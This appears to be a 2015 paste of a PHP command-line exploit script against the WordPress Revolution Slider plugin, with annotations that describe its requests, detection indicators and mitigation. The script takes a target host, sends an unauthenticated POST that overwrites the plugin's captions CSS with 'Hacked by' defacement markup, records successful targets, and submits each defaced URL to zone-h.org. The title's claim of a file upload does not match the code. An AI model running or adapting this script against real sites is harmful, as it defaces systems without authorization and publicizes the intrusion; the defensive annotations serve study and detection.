Kyfx

Wp Plugin Revolution Slider - Unrestricted File Upload Exp

May 21st, 2015
  1. <?php
  2. /*
  3.  Reviewer annotation: interactive CLI script that POSTs to a WordPress site's /wp-admin/admin-ajax.php with action=revslider_ajax_action and client_action=update_captions_css, replacing the Revolution Slider captions content with the markup in the "data" field, then submits the matching get_captions_css URL to zone-h.org.
  4.  Despite the paste title, the code shown uploads no file; its only write to the site is that single POST, which this script sends without any login step.
  5. Kyfx -
  6.  Detection: requests to admin-ajax.php carrying action=revslider_ajax_action with client_action=update_captions_css, arriving with no authenticated session and with the fixed Netscape/7.1 User-Agent set below, are the request-side indicators visible in this listing.
  7.  Mitigation: update Revolution Slider (including copies bundled inside themes) to a vendor-fixed release, and inspect the stored captions CSS for injected markup.
  8. */
  9. $agent = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"; // fixed User-Agent sent with the first request; usable as a log indicator
  10. $******_file_path = "/";
  11. $site = rtrim($site,'/');
  12. echo "\n| Enter Target # ";
  13. $site=trim(fgets(STDIN)); // host name is taken from the operator's terminal
  14. echo "\n| Enter Your **** # ";
  15. $****=trim(fgets(STDIN));
  16. $url= "http://zone-h.org/notify/single"; // defacement-archive submission endpoint used by the second request
  17. $hackmode="1";
  18. $reson="1";
  19. $path ="/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; // read-back URL of the captions CSS; this is what gets reported as the defaced page
  20. echo "\n| Enter Your **** account zone-h # ";
  21. $hacker=trim(fgets(STDIN));
  22.  
  23. $ch = curl_init();
  24. curl_setopt($ch, CURLOPT_URL, "http://".$site."/wp-admin/admin-ajax.php"); // plain-HTTP request to the WordPress AJAX endpoint
  25. curl_setopt($ch, CURLOPT_USERAGENT, $agent);
  26. curl_setopt($ch, CURLOPT_POST, 1);
  27. curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<**** style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by $****<p style='color: transparent'>")); // array form makes cURL send multipart/form-data; "data" is the content the plugin is asked to store
  28. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt($ch, CURLOPT_FOLLOW********, 1);
  30. curl_setopt($ch, CURLOPT_******FILE, $******_file_path);
  31. curl_setopt($ch, CURLOPT_******JAR, $******_file_path);
  32. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // certificate verification switched off
  33. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // host-name verification switched off
  34. $result = curl_exec($ch);
  35. if (eregi('true', $result)) { // success is inferred from a case-insensitive "true" anywhere in the response body
  36. echo "| wait ......\n";
  37. echo "| Success Exploit\n";
  38. echo "| Link Index: http://".$site . "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
  39. $fo = fopen("finish.txt","a+"); // appends to finish.txt in the working directory
  40. $r = fwrite($fo,"http://".$site."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n"); // one read-back URL per line
  41. fclose($fo);}
  42. else {
  43. echo "| http://".$site . " : Not Revslider \n\n";
  44. }
  45. echo "\n\n";
  46. $k = curl_init(); // second handle: the zone-h submission, sent regardless of the result above
  47. curl_setopt($k, CURLOPT_URL, $url);
  48. curl_setopt($k,CURLOPT_POST,1);
  49. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1="."http://".$site."".$path."&hackmode=".$hackmode."&reason=".$reson); // form fields: defacer, domain1, hackmode, reason; values are concatenated without URL-encoding
  50. curl_setopt($k,CURLOPT_FOLLOW********, true);
  51. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  52. $kubra = curl_exec($k);
  53. curl_close($k);
  54. if (eregi('OK', $kubra)) { // submission treated as accepted when the response contains "OK" (case-insensitive)
  55. echo "| Send Site To Zone-H\n";
  56. echo "| Site : ".$site." Defaced !";
  57. } else {
  58. echo "| Send Site To Zone-H\n";
  59. echo "| http://".$site . " : Not Defaced \n\n";
  60. }
  61. curl_close($ch);
  62.  
  63.  
  64.  
  65. ?>